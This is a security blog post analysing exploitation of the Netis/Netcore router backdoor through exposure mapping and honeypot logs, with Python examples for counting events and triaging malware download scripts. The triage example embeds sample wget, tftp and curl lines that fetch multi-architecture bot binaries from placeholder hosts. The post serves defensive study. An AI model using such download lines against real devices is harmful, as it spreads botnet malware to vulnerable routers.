Analysis of the exploitation of the Leike router backdoor

Posted by tetley at 2020-03-14

The Leike router backdoor was discovered by Trend Micro security researchers [1] in 2014, when the reported number of exposed devices was more than 2 million. Today, five years later, our threat capture system still captures exploitation of this vulnerability every day. In this article we therefore analyze its current exposure and how it is being exploited.

The Leike router backdoor listens on port 53413 and exposes a UDP service to the outside world. The backdoor uses a hard-coded password, so when an affected device is exposed on the Internet, an attacker can easily log in and execute arbitrary code on the device.

To find out how many vulnerable devices still exist worldwide, we mapped the Leike routers with the backdoor that are exposed on the Internet.

Unless otherwise specified, the data in this section come from a single round of global mapping (August 2019).

The country with the most exposed Leike routers with the backdoor is China, with close to 3000; other countries have relatively few.

According to the mapping data, the number of exposed Leike routers with the backdoor is far lower than when the backdoor was found in 2014 (2 million to 3000). Although China accounts for 89% of the total, the absolute number is not large. We suspect the relatively large share in China is because Leike is a Chinese manufacturer whose market is mainly domestic. The figure given by the Leike router scanning project [2] is 1028 (scanned on October 18, 2019). We speculate that the difference in the number of exposures may be related to the geographic location of the scanning IP; we have not studied the specific reasons for the difference.

We also verified the backdoor login and found that login succeeds on all of these routers. We did not verify whether commands can be executed after a successful login.

Figure 2.1 Country distribution of Netcore routers with the backdoor

In this section, we use data captured by the Green Alliance threat capture system to illustrate the current threat situation around the Leike router backdoor. The data are logs from March 21, 2019 to October 30, 2019. We analyze the logs captured by the honeypot along three dimensions: attack source, attack event and sample.

1 Attack source analysis

After de-duplicating the source IPs in the honeypot logs, we found 348 unique IPs that connected to the honeypot, 229 of which were used to exploit the backdoor. In terms of the country distribution of the IPs used to exploit the backdoor, the United States has the most, accounting for 51%.

Figure 3.1 Country distribution of log source IPs of the Leike router backdoor honeypot

2 Attack event analysis

We analyzed the attack events in the log data of the Leike router backdoor honeypot. Here we treat all log entries from one unique IP within one day as a single event, and present the number of events per day. As can be seen from the figure, apart from the relatively small number of events in the initial deployment period, the daily number of events and of backdoor exploitation events did not fluctuate much.

Figure 3.2 Distribution of events captured by the Leike router backdoor honeypot
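
The counting rules used in the two subsections above (unique source IPs, and one event per source IP per day), as an added example that is not code from the original report. The log format and the `backdoor=` flag are assumptions, and the log lines are constructed.

```python
from collections import defaultdict
from datetime import datetime

HONEYPOT_PORT = "53413"  # backdoor port named in the article

# Constructed honeypot log lines (not real data). Assumed format:
# ISO timestamp, source IP, destination UDP port, and a flag the honeypot
# sets when the payload matched the backdoor login/command exchange.
SAMPLE_LOG = """\
2019-09-01T00:12:03 198.51.100.7 53413 backdoor=1
2019-09-01T00:12:09 198.51.100.7 53413 backdoor=1
2019-09-01T08:40:51 203.0.113.20 53413 backdoor=0
2019-09-02T03:05:17 198.51.100.7 53413 backdoor=1
2019-09-02T11:59:02 192.0.2.44 53413 backdoor=1
2019-09-02T12:00:10 203.0.113.20 53413 backdoor=0
malformed line that the parser must skip
"""

def parse(log_text):
    """Yield (day, source IP, used_backdoor) for each well-formed line."""
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4 or parts[2] != HONEYPOT_PORT:
            continue
        if parts[3] not in ("backdoor=0", "backdoor=1"):
            continue
        try:
            day = datetime.fromisoformat(parts[0]).date()
        except ValueError:
            continue
        yield day, parts[1], parts[3] == "backdoor=1"

def summarize(log_text):
    """Return (unique IPs, unique IPs using the backdoor, per-day event counts)."""
    all_ips, backdoor_ips = set(), set()
    events = defaultdict(set)           # day -> source IPs seen that day
    backdoor_events = defaultdict(set)  # day -> source IPs that used the backdoor
    for day, ip, used_backdoor in parse(log_text):
        all_ips.add(ip)
        events[day].add(ip)             # repeated hits by one IP collapse to one event
        if used_backdoor:
            backdoor_ips.add(ip)
            backdoor_events[day].add(ip)
    per_day = {str(d): (len(events[d]), len(backdoor_events[d])) for d in sorted(events)}
    return len(all_ips), len(backdoor_ips), per_day

if __name__ == "__main__":
    total, used, per_day = summarize(SAMPLE_LOG)
    print(f"unique IPs: {total}, unique IPs using the backdoor: {used}")
    for day, (n_events, n_backdoor) in per_day.items():
        print(day, "events:", n_events, "backdoor events:", n_backdoor)
```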

3 Sample analysis

We also analyzed the sample download addresses and C&C servers. After de-duplication, we obtained 31 valid sample download addresses and 29 C&C servers. Correlating the two shows that in the vast majority of cases the sample download address and the C&C are the same. Therefore, only the country distribution of the sample download addresses is analyzed below. As the figure shows, the United States and the Netherlands account for the largest proportion, which is consistent with the country distribution of the IPs used to exploit the backdoor.

Note: the sample data is from September and October 2019.

Figure 3.3 Country distribution of sample download addresses captured by the Leike router backdoor honeypot

Analysis of the sample download scripts shows that they generally support a variety of architectures. In the example we give, the attack group's samples support 12 architectures, including MIPS, ARM, x86, PowerPC, etc. Moreover, the download script does not check the architecture of the compromised device; it simply downloads each sample and tries to run it.

Figure 3.4 Example of a sample download script captured by the Leike router backdoor honeypot
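
For triage of a captured download script like the one described above, the following added example (not code from the original report) extracts the download hosts and the architectures a script fetches, and flags scripts that fetch many architectures without checking the device first. The script text, hosts, file names and the suffix-to-architecture mapping are constructed assumptions.

```python
import re
from urllib.parse import urlparse

# Constructed download script (not a captured sample). Hosts are documentation
# addresses; the chmod/execute steps that follow each fetch are omitted here.
SAMPLE_SCRIPT = """\
cd /tmp || cd /var/run
wget http://198.51.100.7/bins/netc.mips
wget http://198.51.100.7/bins/netc.mpsl
wget http://198.51.100.7/bins/netc.arm
wget http://198.51.100.7/bins/netc.arm7
wget http://198.51.100.7/bins/netc.x86
tftp -g -r netc.ppc 198.51.100.7
curl -O http://203.0.113.20/netc.sh4
"""

# Assumed mapping from file-name suffix to architecture family.
ARCH_SUFFIXES = {
    "mips": "MIPS", "mpsl": "MIPS", "arm": "ARM", "arm5": "ARM",
    "arm6": "ARM", "arm7": "ARM", "x86": "x86", "ppc": "PowerPC",
    "sh4": "SuperH", "m68k": "m68k", "spc": "SPARC",
}

URL_RE = re.compile(r"https?://[^\s;'\"]+")
TFTP_RE = re.compile(r"tftp\s+.*?-r\s+(\S+)\s+(\S+)")  # busybox: -r FILE HOST

def triage(script):
    """Summarize download hosts and architectures referenced by a script."""
    targets = [(urlparse(u).hostname, urlparse(u).path) for u in URL_RE.findall(script)]
    targets += [(host, name) for name, host in TFTP_RE.findall(script)]
    hosts, archs, unknown = set(), set(), []
    for host, path in targets:
        hosts.add(host)
        suffix = path.rsplit(".", 1)[-1].lower()
        if suffix in ARCH_SUFFIXES:
            archs.add(ARCH_SUFFIXES[suffix])
        else:
            unknown.append(path)        # keep for manual review
    # A script that inspects the device first is not spraying blindly.
    checks_arch = bool(re.search(r"\buname\b|/proc/cpuinfo", script))
    return {
        "hosts": sorted(hosts),
        "archs": sorted(archs),
        "unknown": unknown,
        "spray": len(archs) >= 3 and not checks_arch,
    }

if __name__ == "__main__":
    print(triage(SAMPLE_SCRIPT))
```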

Compared with five years ago, the risk of backdoor exploitation faced by Leike routers has dropped considerably. Currently, fewer than 3000 Leike routers with the backdoor are exposed. Although that number is small, attackers are still exploiting them.

For such cases, our suggestions are as follows:

As a user: consider upgrading the firmware of the device, or purchasing a new device to replace one that has been in use for many years.

As a regulator: promote the remediation of similar vulnerabilities.

As a device manufacturer: provide an OTA upgrade mechanism so that when products are found to have vulnerabilities, they can be fixed conveniently and in a timely manner.


[1].Netis Routers Leave Wide Open Backdoor,
